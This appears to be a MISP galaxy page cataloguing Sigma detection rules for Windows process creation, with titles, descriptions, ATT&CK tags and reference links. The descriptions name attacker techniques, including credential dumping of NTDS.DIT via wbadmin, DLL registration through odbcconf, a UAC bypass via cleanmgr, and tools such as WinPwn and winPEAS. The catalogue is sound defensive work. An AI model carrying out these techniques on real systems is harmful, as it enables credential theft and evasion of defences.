| author | Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel |
| creation_date | 2023-08-08 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_provlaunch_potential_abuse.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Copy From Or To Admin Share Or Sysvol Folder
Detects a copy command or a copy utility execution to or from an Admin share or remote
Internal MISP references
UUID 855bc8b5-2ae8-402e-a9ed-b889e6df1900 which can be used as unique global reference for Copy From Or To Admin Share Or Sysvol Folder in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/SBousseaden/status/1211636381086339073 - webarchive
- https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view - webarchive
- https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali |
| creation_date | 2019-12-30 |
| falsepositive | ['Administrative scripts'] |
| filename | proc_creation_win_susp_copy_lateral_movement.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.collection', 'attack.exfiltration', 'attack.t1039', 'attack.t1048', 'attack.t1021.002'] |
Gpscript Execution
Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
Internal MISP references
UUID 1e59c230-6670-45bf-83b0-98903780607e which can be used as unique global reference for Gpscript Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-16 |
| falsepositive | ['Legitimate uses of logon scripts distributed via group policy'] |
| filename | proc_creation_win_lolbin_gpscript.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
New DLL Registered Via Odbcconf.EXE
Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
Internal MISP references
UUID 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 which can be used as unique global reference for New DLL Registered Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 - webarchive
- https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - webarchive
- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - webarchive
- https://redcanary.com/blog/raspberry-robin/ - webarchive
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-22 |
| falsepositive | ['Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.'] |
| filename | proc_creation_win_odbcconf_register_dll_regsvr.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.008'] |
Certificate Exported Via Certutil.EXE
Detects the execution of certutil with the "exportPFX" flag, which allows the utility to export certificates.
Internal MISP references
UUID 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 which can be used as unique global reference for Certificate Exported Via Certutil.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-15 |
| falsepositive | ["There are legitimate reasons to export certificates. Investigate the activity to determine if it's benign"] |
| filename | proc_creation_win_certutil_export_pfx.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027'] |
File Encryption Using Gpg4win
Detects usage of Gpg4win to encrypt files
Internal MISP references
UUID 550bbb84-ce5d-4e61-84ad-e590f0024dcd which can be used as unique global reference for File Encryption Using Gpg4win in MISP communities and other software using the MISP galaxy
External references
- https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - webarchive
- https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ - webarchive
- https://www.gpg4win.de/documentation.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_gpg4win_encryption.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Dism Remove Online Package
Detects use of the Deployment Image Servicing and Management tool (DISM) to remove an online package. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
Internal MISP references
UUID 43e32da2-fdd0-4156-90de-50dfd62636f9 which can be used as unique global reference for Dism Remove Online Package in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism - webarchive
- https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dism_remove.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-16 |
| falsepositive | ['Legitimate script'] |
| filename | proc_creation_win_dism_remove.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Sensitive File Recovery From Backup Via Wbadmin.EXE
Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
Internal MISP references
UUID 84972c80-251c-4c3a-9079-4f00aad93938 which can be used as unique global reference for Sensitive File Recovery From Backup Via Wbadmin.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/ - webarchive
- https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2024-05-10 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wbadmin_restore_sensitive_files.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
Root Certificate Installed From Susp Locations
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Internal MISP references
UUID 5f6a601c-2ecb-498b-9c33-660362323afa which can be used as unique global reference for Root Certificate Installed From Susp Locations in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - webarchive
- https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-09 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_powershell_import_cert_susp_locations.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1553.004'] |
WmiPrvSE Spawned A Process
Detects WmiPrvSE spawning a process
Internal MISP references
UUID d21374ff-f574-44a7-9998-4a8c8bf33d7d which can be used as unique global reference for WmiPrvSE Spawned A Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez @Cyb3rWard0g |
| creation_date | 2019-08-15 |
| falsepositive | ['False positives are expected (e.g. in environments where WinRM is used legitimately)'] |
| filename | proc_creation_win_wmiprvse_spawning_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
HackTool - SharpWSUS/WSUSpendu Execution
Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
Internal MISP references
UUID b0ce780f-10bd-496d-9067-066d23dc3aa5 which can be used as unique global reference for HackTool - SharpWSUS/WSUSpendu Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/nettitude/SharpWSUS - webarchive
- https://labs.nettitude.com/blog/introducing-sharpwsus/ - webarchive
- https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @Kostastsale, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.lateral-movement', 'attack.t1210'] |
Rundll32 Execution With Uncommon DLL Extension
Detects the execution of rundll32 with a command line that does not contain a common DLL extension.
Internal MISP references
UUID c3a99af4-35a9-4668-879e-c09aeb4f2bdf which can be used as unique global reference for Rundll32 Execution With Uncommon DLL Extension in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou |
| creation_date | 2022-01-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_uncommon_dll_extension.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011'] |
Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
Detects the start of non built-in assistive technology applications via "Atbroker.EXE".
Internal MISP references
UUID f24bcaea-0cd1-11eb-adc1-0242ac120002 which can be used as unique global reference for Uncommon Assistive Technology Applications Execution Via AtBroker.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Mateusz Wydra, oscd.community |
| creation_date | 2020-10-12 |
| falsepositive | ['Legitimate, non-default assistive technology applications execution'] |
| filename | proc_creation_win_atbroker_uncommon_ats_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
UAC Bypass Using Disk Cleanup
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
Internal MISP references
UUID b697e69c-746f-4a86-9f59-7bfff8eab881 which can be used as unique global reference for UAC Bypass Using Disk Cleanup in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_cleanmgr.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
AddinUtil.EXE Execution From Uncommon Directory
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
Internal MISP references
UUID 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 which can be used as unique global reference for AddinUtil.EXE Execution From Uncommon Directory in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) |
| creation_date | 2023-09-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_addinutil_uncommon_dir_exec.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Hidden Powershell in Link File Pattern
Detects events that appear when a user clicks on a link file with a PowerShell command embedded in it.
Internal MISP references
UUID 30e92f50-bb5a-4884-98b5-d20aa80f3d7a which can be used as unique global reference for Hidden Powershell in Link File Pattern in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-06 |
| falsepositive | ['Legitimate commands in .lnk files'] |
| filename | proc_creation_win_susp_embed_exe_lnk.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
HackTool - RedMimicry Winnti Playbook Execution
Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility.
Internal MISP references
UUID 95022b85-ff2a-49fa-939a-d7b8f56eeb9b which can be used as unique global reference for HackTool - RedMimicry Winnti Playbook Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Alexander Rausch |
| creation_date | 2020-06-24 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_redmimicry_winnti_playbook.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1106', 'attack.t1059.003', 'attack.t1218.011'] |
Potential Command Line Path Traversal Evasion Attempt
Detects potential evasion or obfuscation attempts using bogus path traversal via the command line.
Internal MISP references
UUID 1327381e-6ab0-4f38-b583-4c1b8346a56b which can be used as unique global reference for Potential Command Line Path Traversal Evasion Attempt in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-10-26 |
| falsepositive | ['Google Drive', 'Citrix'] |
| filename | proc_creation_win_susp_commandline_path_traversal_evasion.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Interactive AT Job
Detects an interactive AT job, which may be used as a form of privilege escalation.
Internal MISP references
UUID 60fc936d-2eb0-4543-8a13-911c750a1dfc which can be used as unique global reference for Interactive AT Job in MISP communities and other software using the MISP galaxy
External references
- https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community |
| creation_date | 2019-10-24 |
| falsepositive | ['Unlikely (at.exe deprecated as of Windows 8)'] |
| filename | proc_creation_win_at_interactive_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.execution', 'attack.privilege-escalation', 'attack.t1053.002'] |
PUA - DefenderCheck Execution
Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
Internal MISP references
UUID f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 which can be used as unique global reference for PUA - DefenderCheck Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-08-30 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_pua_defendercheck.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027.005'] |
NodeJS Execution of JavaScript File
Detects execution of JavaScript or JSC files using the Node.js binary node.exe, which could be potentially suspicious. Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
Internal MISP references
UUID ba3874b9-0fae-465f-836c-eb5d071a1789 which can be used as unique global reference for NodeJS Execution of JavaScript File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-04-21 |
| falsepositive | ['Legitimate use of node.exe to execute JavaScript or JSC files on your environment'] |
| filename | proc_creation_win_security_susp_node_js_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.007'] |
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.
Internal MISP references
UUID 692f0bec-83ba-4d04-af7e-e884a96059b6 which can be used as unique global reference for Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis @Karneades |
| creation_date | 2019-04-03 |
| falsepositive | ['AppvClient', 'CCM', 'WinRM'] |
| filename | proc_creation_win_wmiprvse_spawns_powershell.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047', 'attack.t1059.001'] |
User Discovery And Export Via Get-ADUser Cmdlet
Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file.
Internal MISP references
UUID 1114e048-b69c-4f41-bc20-657245ae6e3f which can be used as unique global reference for User Discovery And Export Via Get-ADUser Cmdlet in MISP communities and other software using the MISP galaxy
External references
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-09 |
| falsepositive | ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"] |
| filename | proc_creation_win_powershell_user_discovery_get_aduser.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1033'] |
Filter Driver Unloaded Via Fltmc.EXE
Detects filter driver unloading activity via fltmc.exe.
Internal MISP references
UUID 4931188c-178e-4ee7-a348-39e8a7a56821 which can be used as unique global reference for Filter Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom - webarchive
- https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_fltmc_unload_driver.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002'] |
Powershell Executed From Headless ConHost Process
Detects the use of PowerShell commands from a headless ConHost window. The "--headless" flag hides the window from the user upon execution.
Internal MISP references
UUID 056c7317-9a09-4bd4-9067-d051312752ea which can be used as unique global reference for Powershell Executed From Headless ConHost Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Matt Anderson (Huntress) |
| creation_date | 2024-07-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_conhost_headless_powershell.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1564.003'] |
Related clusters
To see the related clusters, click here.
Renamed Whoami Execution
Detects the execution of whoami that has been renamed to a different name to avoid detection
Internal MISP references
UUID f1086bf7-a0c4-4a37-9102-01e573caf4a0 which can be used as unique global reference for Renamed Whoami Execution in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ - webarchive
- https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-08-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_whoami.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1033', 'car.2016-03-001'] |
Related clusters
To see the related clusters, click here.
HackTool - WinPwn Execution
Detects command-line keywords indicative of potential usage of WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Internal MISP references
UUID d557dc06-62e8-4468-a8e8-7984124908ce which can be used as unique global reference for HackTool - WinPwn Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md - webarchive
- https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841 - webarchive
- https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/ - webarchive
- https://github.com/S3cur3Th1sSh1t/WinPwn - webarchive
- https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel |
| creation_date | 2023-12-04 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_winpwn.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.defense-evasion', 'attack.discovery', 'attack.execution', 'attack.privilege-escalation', 'attack.t1046', 'attack.t1082', 'attack.t1106', 'attack.t1518', 'attack.t1548.002', 'attack.t1552.001', 'attack.t1555', 'attack.t1555.003'] |
Related clusters
To see the related clusters, click here.
Suspicious Child Process Created as System
Detects child processes spawned with SYSTEM privileges by parent processes running under the LOCAL SERVICE or NETWORK SERVICE accounts
Internal MISP references
UUID 590a5f4c-6c8c-4f10-8307-89afe9453a9d which can be used as unique global reference for Suspicious Child Process Created as System in MISP communities and other software using the MISP galaxy
External references
- https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - webarchive
- https://twitter.com/Cyb3rWard0g/status/1453123054243024897 - webarchive
- https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - webarchive
- https://github.com/antonioCoco/RogueWinRM - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) |
| creation_date | 2019-10-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_child_process_as_system_.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1134.002'] |
Related clusters
To see the related clusters, click here.
Suspicious MSDT Parent Process
Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
Internal MISP references
UUID 7a74da6b-ea76-47db-92cc-874ad90df734 which can be used as unique global reference for Suspicious MSDT Parent Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nextron Systems |
| creation_date | 2022-06-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_msdt_susp_parent.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Use Icacls to Hide File to Everyone
Detects the use of icacls to deny access to everyone on the Users folder, a technique sometimes used to hide malicious files
Internal MISP references
UUID 4ae81040-fc1c-4249-bfa3-938d260214d9 which can be used as unique global reference for Use Icacls to Hide File to Everyone in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-07-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_icacls_deny.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.001'] |
Related clusters
To see the related clusters, click here.
HackTool - winPEAS Execution
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
Internal MISP references
UUID 98b53e78-ebaf-46f8-be06-421aafd176d9 which can be used as unique global reference for HackTool - winPEAS Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Georg Lauenstein (sure[secure]) |
| creation_date | 2022-09-19 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_winpeas.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.discovery', 'attack.t1082', 'attack.t1087', 'attack.t1046'] |
Related clusters
To see the related clusters, click here.
Arbitrary Binary Execution Using GUP Utility
Detects execution of the Notepad++ updater (gup) to launch other commands or executables
Internal MISP references
UUID d65aee4d-2292-4cea-b832-83accd6cfa43 which can be used as unique global reference for Arbitrary Binary Execution Using GUP Utility in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-10 |
| falsepositive | ['Other parent binaries using GUP not currently identified'] |
| filename | proc_creation_win_gup_arbitrary_binary_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Suspicious Powercfg Execution To Change Lock Screen Timeout
Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
Internal MISP references
UUID f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b which can be used as unique global reference for Suspicious Powercfg Execution To Change Lock Screen Timeout in MISP communities and other software using the MISP galaxy
External references
- https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - webarchive
- https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-11-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powercfg_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Gzip Archive Decode Via PowerShell
Detects attempts of decoding encoded Gzip archives via PowerShell.
Internal MISP references
UUID 98767d61-b2e8-4d71-b661-e36783ee24c1 which can be used as unique global reference for Gzip Archive Decode Via PowerShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Hieu Tran |
| creation_date | 2023-03-13 |
| falsepositive | ['Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions'] |
| filename | proc_creation_win_powershell_decode_gzip.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1132.001'] |
Related clusters
To see the related clusters, click here.
Suspicious GrpConv Execution
Detects the suspicious execution of GrpConv, a utility that converts Windows 3.x .grp files, which can be used for persistence purposes by malicious software or actors
Internal MISP references
UUID f14e169e-9978-4c69-acb3-1cff8200bc36 which can be used as unique global reference for Suspicious GrpConv Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-05-19 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_susp_grpconv.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547'] |
